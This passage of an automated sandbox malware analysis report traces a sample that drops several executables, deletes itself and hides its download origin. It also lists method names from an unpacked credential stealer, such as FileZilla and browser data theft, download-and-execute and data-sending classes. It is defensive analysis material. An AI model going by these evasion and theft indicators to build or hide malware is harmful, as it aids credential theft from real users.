                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\DA6F.exe C:\Users\user~1\AppData\Local\Temp\DA6F.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E8E7.exe C:\Users\user~1\AppData\Local\Temp\E8E7.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\FB48.exe C:\Users\user~1\AppData\Local\Temp\FB48.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\2D0D.exe C:\Users\user~1\AppData\Local\Temp\2D0D.exe
                      Source: C:\Users\user\AppData\Roaming\rfudbriProcess created: C:\Users\user\AppData\Roaming\rfudbri C:\Users\user\AppData\Roaming\rfudbri
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeProcess created: C:\Users\user\AppData\Local\Temp\BEE7.exe C:\Users\user~1\AppData\Local\Temp\BEE7.exe
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess created: C:\Users\user\AppData\Local\Temp\E8E7.exe C:\Users\user~1\AppData\Local\Temp\E8E7.exe
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess created: C:\Users\user\AppData\Local\Temp\E8E7.exe C:\Users\user~1\AppData\Local\Temp\E8E7.exe
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user~1\AppData\Local\Temp\BEE7.tmpJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4580:120:WilError_01
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: X5lLjSzDd8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: X5lLjSzDd8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: X5lLjSzDd8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: X5lLjSzDd8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: X5lLjSzDd8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: X5lLjSzDd8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: X5lLjSzDd8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: \C:\risoferacev\79_bositi\vuka\rakusayafona_k.pdb source: X5lLjSzDd8.exe, 00000000.00000000.249790357.0000000000401000.00000020.00020000.sdmp, X5lLjSzDd8.exe, 00000003.00000000.265422304.0000000000401000.00000020.00020000.sdmp, rfudbri, 0000000F.00000000.373421970.0000000000401000.00000020.00020000.sdmp, rfudbri, 00000014.00000000.400193517.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: C:\xeyox pacoramebe.pdb source: BEE7.exe, 00000010.00000000.376294361.0000000000401000.00000020.00020000.sdmp, BEE7.exe, 00000012.00000000.396723249.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: DA6F.exe, 00000011.00000002.525448053.0000000000D68000.00000040.00020000.sdmp, 2D0D.exe, 0000001B.00000002.526418179.0000000001280000.00000040.00020000.sdmp
                      Source: Binary string: TC:\xeyox pacoramebe.pdbP source: BEE7.exe, 00000010.00000000.376294361.0000000000401000.00000020.00020000.sdmp, BEE7.exe, 00000012.00000000.396723249.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: C:\risoferacev\79_bositi\vuka\rakusayafona_k.pdb source: X5lLjSzDd8.exe, 00000000.00000000.249790357.0000000000401000.00000020.00020000.sdmp, X5lLjSzDd8.exe, 00000003.00000000.265422304.0000000000401000.00000020.00020000.sdmp, rfudbri, 0000000F.00000000.373421970.0000000000401000.00000020.00020000.sdmp, rfudbri, 00000014.00000000.400193517.0000000000401000.00000020.00020000.sdmp

                      Data Obfuscation:

                      barindex
                      Detected unpacking (changes PE section rights)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeUnpacked PE file: 17.2.DA6F.exe.ce0000.0.unpack :ER;.rsrc:R; :R;.idata:W;.themida:EW;.boot:ER; vs :ER;.rsrc:R; :R;
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeUnpacked PE file: 27.2.2D0D.exe.1210000.0.unpack :ER;.rsrc:R; :R;.idata:W;.themida:EW;.boot:ER; vs :ER;.rsrc:R; :R;
                      .NET source code contains method to dynamically call methods (often used by packers)Show sources
                      Source: 17.2.DA6F.exe.ce0000.0.unpack, YQUl6FsJIQpBDXNkRS/wdOavvWYrPNEvA9OIm.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeCode function: 0_2_0210198B push ebx; iretd
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeCode function: 0_2_02101970 push ebx; iretd
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeCode function: 0_2_02101977 push ebx; iretd
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeCode function: 0_2_022FE42D push ebx; iretd
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeCode function: 0_2_022FE442 push ebx; iretd
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeCode function: 0_2_023032CE pushad ; iretd
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeCode function: 3_2_004011D0 push ebx; iretd
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeCode function: 3_2_004011D7 push ebx; iretd
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeCode function: 3_2_004011EB push ebx; iretd
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeCode function: 3_1_004011D0 push ebx; iretd
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeCode function: 3_1_004011D7 push ebx; iretd
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeCode function: 3_1_004011EB push ebx; iretd
                      Source: C:\Users\user\AppData\Roaming\rfudbriCode function: 15_2_020F198B push ebx; iretd
                      Source: C:\Users\user\AppData\Roaming\rfudbriCode function: 15_2_020F1977 push ebx; iretd
                      Source: C:\Users\user\AppData\Roaming\rfudbriCode function: 15_2_020F1970 push ebx; iretd
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeCode function: 17_2_0199453A pushfd ; iretd
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeCode function: 17_2_0199452F pushfd ; iretd
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeCode function: 17_2_0199F101 push esi; retf
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeCode function: 17_2_0199F052 push esi; retf
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeCode function: 17_2_0199F233 push esi; retf
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeCode function: 18_2_004011D0 push ebx; iretd
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeCode function: 18_2_004011D7 push ebx; iretd
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeCode function: 18_2_004011EB push ebx; iretd
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeCode function: 19_2_007541AC pushfd ; retf 0005h
                      Source: C:\Users\user\AppData\Roaming\rfudbriCode function: 20_2_004011D0 push ebx; iretd
                      Source: C:\Users\user\AppData\Roaming\rfudbriCode function: 20_2_004011D7 push ebx; iretd
                      Source: C:\Users\user\AppData\Roaming\rfudbriCode function: 20_2_004011EB push ebx; iretd
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeCode function: 24_2_001141AC pushfd ; retf 0005h
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeCode function: 27_2_03C769A9 push 0000005Eh; ret
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeCode function: 28_2_004741AC pushfd ; retf 0005h
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeCode function: 28_2_00D43CCB push esp; iretd
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeCode function: 0_2_004288F0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                      Source: DA6F.exe.6.drStatic PE information: 0x80DA7EDD [Sat Jul 3 20:49:33 2038 UTC]
                      Source: DA6F.exe.6.drStatic PE information: section name:
                      Source: DA6F.exe.6.drStatic PE information: section name:
                      Source: DA6F.exe.6.drStatic PE information: section name: .themida
                      Source: DA6F.exe.6.drStatic PE information: section name: .boot
                      Source: FB48.exe.6.drStatic PE information: section name: I!&%+
                      Source: FB48.exe.6.drStatic PE information: section name:
                      Source: 2D0D.exe.6.drStatic PE information: section name:
                      Source: 2D0D.exe.6.drStatic PE information: section name:
                      Source: 2D0D.exe.6.drStatic PE information: section name: .themida
                      Source: 2D0D.exe.6.drStatic PE information: section name: .boot
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.99711760702
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.05530122189
                      Source: initial sampleStatic PE information: section name: entropy: 7.98453885411
                      Source: initial sampleStatic PE information: section name: I!&%+ entropy: 7.99661105632
                      Source: initial sampleStatic PE information: section name: entropy: 7.97900688875
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.99711760702
                      Source: 17.2.DA6F.exe.ce0000.0.unpack, EntityCreator.csHigh entropy of concatenated method names: 'S??n', 'Lnx5j2OpU', 'kK3pE6eYA', 'oYBVHpWeX', 'k5reQ9glK', 'reNNdNpKm', 'QVcIJhcft', 'MakeTries', 'c1xGITmJNQWgP3NSjR', 'aLlnrcYJL7Lq3wreMB'
                      Source: 17.2.DA6F.exe.ce0000.0.unpack, CryptoHelper.csHigh entropy of concatenated method names: 'DecryptBlob', 'DecryptBlob', 'GetMd5Hash', 'EIJh1PhUo', 'gViPDKrkDCagI8Zcd1S', 'NySwqgrrrMV96pmomBB', 'EaqQICr6h4yV4Zp5RRR', 'tZ456d58vPOayciV80', 'LTZdSPzT1csSwKm3ol', 'x9MkwqrBMlTDc9MD93x'
                      Source: 17.2.DA6F.exe.ce0000.0.unpack, Aes.csHigh entropy of concatenated method names: '.ctor', 'Finalize', 'u00613EiV', 'BCryptOpenAlgorithmProvider', 'BCryptCloseAlgorithmProvider', 'BCryptDecrypt', 'BCryptDestroyKey', 'BCryptGetProperty', 'BCryptSetAlgorithmProperty', 'BCryptImportKey'
                      Source: 17.2.DA6F.exe.ce0000.0.unpack, Sosex9UsJxoYsgvnh3/uN5NRlBLDXfTaxyyXr.csHigh entropy of concatenated method names: 'c6CeSOLCA5', 'MxwevjyORR', 'abLewp2weD', '.ctor', 'kLjw4iIsCLsZtxc4lksN0j', '.cctor', 'cQNOp8niJ6wrJeuy6V', 'KX3aZdrqBsYiKIbjAu', 'YloNUge8URQmU9f0wt', 'BmTgGyUHabWJRQPfEN'
                      Source: 17.2.DA6F.exe.ce0000.0.unpack, YQUl6FsJIQpBDXNkRS/wdOavvWYrPNEvA9OIm.csHigh entropy of concatenated method names: '.cctor', 'Myao92RrvsqEX', 'uesVGx4OXt', 'Qi7VZg329y', 'V43V64pFeh', 'OuYVLJIloH', 'x5PVEgEfdN', 'MRDVhFFdsr', 'cU7V49bNpH', 'alIVPMTHX6'
                      Source: 17.2.DA6F.exe.ce0000.0.unpack, IPv4Helper.csHigh entropy of concatenated method names: 'xRymgJeXu', 'GetDefaultIPv4Address', 'D7y9oaXvo', 'de2xynWijHmmeHPZuSs', 'RPnarLWjb7c1M4ZLlx0', 'SvydttWttj9H1UVNRRR', 'DdAqKMWR7MLFkwcUwDd', 'd8133eWXiXn1oFWWLUl', 'RYZBl3WuduAdsgQXO4N', 'm1akseWgKKTUkSwI807'
                      Source: 17.2.DA6F.exe.ce0000.0.unpack, GdiHelper.csHigh entropy of concatenated method names: 'zv2vxWtB8', 'GetWindowsScreenScalingFactor', 'MonitorSize', 'GetImageBase', 'DqEwLoFJv', 'F91lGEW6NuA7nvLext3', 'oQuR4mWBEApTiBZ17Aa', 'U1bpMQWelY9bOI4veCA', 'K9k2cuWWmC5tSv7n2ih', 'jcEBnEWkV7mdinc3oKC'
                      Source: 17.2.DA6F.exe.ce0000.0.unpack, g_E_c_?_0.csHigh entropy of concatenated method names: 'TryFind', 'wg2tn93ME', 'GeckoRoamingName', 'GeckoLocalName', 'KFNVLj92AYSwE6SJ2f', 'FUs2HChiDmDRpk9Wrt', 'Gj0gsLZhk1QL24mgkf', 'S5wld6PLgMv5ouWN3s', 'wiB9Me3mRTsOXVFysH', 'eThCQo7fUUkCtFBxPY'
                      Source: 17.2.DA6F.exe.ce0000.0.unpack, FileZilla.csHigh entropy of concatenated method names: 'Scan', 'zbncgd9Cu', 'OE1jDonNe', '.ctor', 'FAy1u9RDmw36xISBv8', 'frYxOPX9NEkFSqTQE4', 'qkDQySugEhjKPHcqUo', 'aCeXmugTxCkOJGmWlu', 'rx4Tlq1MKTw2eYIMpk', 'Ltb8V5JhTsPSCXagTP'
                      Source: 17.2.DA6F.exe.ce0000.0.unpack, DownloadAndExecuteUpdate.csHigh entropy of concatenated method names: 'IsValidAction', 'Process', '.ctor', 'MAFlmveE7J8G7mZ51vH', 'wHpZDieCHFFZWYsHWFZ', 'RhwVjpeKXa8iBg7xxA4', 'ItFRlkeQ6rgeW3YhqgH', 'dt3KE1ejPpB5Qp6DLgx', 'zA5nLMets3L0n3fp3I7', 'zivfvZei81qwXLovKQn'
                      Source: 17.2.DA6F.exe.ce0000.0.unpack, Program.csHigh entropy of concatenated method names: 'jJkudOavv', 'Run', '.cctor', 'PQinUdr9lKwqoC3hjVi', 'g2TDrGrhaJ0djCZkPLV', 'qotGSyrZea1vPBCN0Ry', 'dJOnkMr7GVI7JKGv12I', 'J76s7Hrwhb0cyvyIVWX', 'l6Snv7rAUmX2j7CFb2v', 'WUK5NgraKkdfmqvWycA'
                      Source: 17.2.DA6F.exe.ce0000.0.unpack, StringDecrypt.csHigh entropy of concatenated method names: 'Xor', 'tZb4vnU3J', 'ytMPmhJCP', 'Read', 'cy1CJUrdu8UFOHejflF', 'iG8XedrMt3gwxBnmPC5', 'JJehverNxokW23uty0l', 'OSUOpQrEnmUw6rmXsUn', 'IJBmnorm64hwIYbKT98', 'hRMj4CrYUjB221fsJrS'
                      Source: 17.2.DA6F.exe.ce0000.0.unpack, CommandLineUpdate.csHigh entropy of concatenated method names: 'IsValidAction', 'Process', '.ctor', 'JtutHoeehCLC4XdjDYS', 'xF2fDLeWF9w9sN7KeVI', 'M7y0WoeI7kT7tQw16CB', 'x67gobemvsg7aJqWbfr', 'qN84MyeYnU2RIanQaln', 'LQF16iedtrCvQMsAeXu', 'K01HCSeMeWgJWXDhpEh'
                      Source: 17.2.DA6F.exe.ce0000.0.unpack, DataBaseConnectionHandler.csHigh entropy of concatenated method names: 'get_RowLength', '.ctor', 'GatherValue', 'pITJrlyec', 'ReadContextTable', 'PpHHWWJNp', 'ReadContextValue', 'XCkDQeC9Z', 'Count', 'C4abqcySI'
                      Source: 17.2.DA6F.exe.ce0000.0.unpack, FullInfoSender.csHigh entropy of concatenated method names: '.ctor', 'Send', 'sdfk8h34', 'Visible', 'asdk9y3', 'kadsoji83', 'kkdhfakdasd', 'sdfm83kjasd', 'sdfkas83', 'gkdsi8y234'
                      Source: 17.2.DA6F.exe.ce0000.0.unpack, PartsSender.csHigh entropy of concatenated method names: '.ctor', 'Send', 'sdf9j3nasd', 'Visible', 'LSIDsd2', 'asdkadu8', 'sdfo8n234', 'sdfi35sdf', 'asd44123', 'fdfg9i3jn4'
                      Source: 17.2.DA6F.exe.ce0000.0.unpack, Extensions.csHigh entropy of concatenated method names: 'ReadFile', 'ReadFileAsText', 'ChangeType', 'StripQuotes', 'DomainExists', 'PreCheck', 'sIlkb1eAZV43lYj0b4t', 'YaDA5TeagEkYMUxAt8D', 'VQKqWPefxPOVKCcHOG6', 'Ck89YBenZpDPQhlpmmM'
                      Source: 17.2.DA6F.exe.ce0000.0.unpack, SystemInfoHelper.csHigh entropy of concatenated method names: 'CreateBind', 'GetProcessors', 'GetGraphicCards', 'GetBrowsers', 'GetSerialNumber', 'ListOfProcesses', 'GetVs', 'GetProcessesByName', 'ListOfPrograms', 'AvailableLanguages'
                      Source: 17.2.DA6F.exe.ce0000.0.unpack, lcLVkhtDHYIJ1PhUo0/J70013jEiVV3YpTHpV.csHigh entropy of concatenated method names: 'PRIo92RREy4AB', '.ctor', '.cctor', 'X1MHXvMX7ZGK28o6aNV', 'DY64gNMunaJeS8skZvg', 'thD5j2MgMkxOYaZ2Irw', 'ybLNi9M1GxKLrJAWvOO', 'STF2btMiCCTT20r7wWn', 'Gs0b1CMRrEKWqXi4JdN', 'OV9cMuMJxrZdSYCBhta'
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rfudbriJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\DA6F.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\FB48.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\E8E7.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rfudbriJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\BEE7.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\2D0D.exeJump to dropped file

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Deletes itself after installationShow sources
                      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\x5lljszdd8.exeJump to behavior
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\rfudbri:Zone.Identifier read attributes | delete
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
